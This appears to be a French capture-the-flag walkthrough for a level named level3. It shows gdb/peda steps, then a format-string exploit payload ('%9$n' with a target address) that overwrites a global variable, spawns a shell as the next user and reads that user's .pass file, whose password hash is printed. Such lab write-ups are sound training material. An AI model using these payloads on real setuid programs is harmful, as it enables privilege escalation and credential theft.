Note: Installer peda si cela n'est pas deja fait.

ls -l

gbd ./leval3
source /tmp/peda/peda.py
set disassembly-flavor intel
breakpoint juste apres printf: b *0x080484da

x/d 0x804988c
---> 0x804988c <m>:	64
quit

r < <(python -c 'print "A" * 20 + "\x8c\x98\x04\x08" + "B" * 40 + "%9$n"')

python -c 'print "A" * 20 + "\x8c\x98\x04\x08" + "B" * 40 + "%9$n"' > /tmp/tmp

cat /tmp/tmp - | ./level3

Ca lance /bin/sh.
whoami

--> level4

cd /home/user/level3
cat .pass

--> b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa
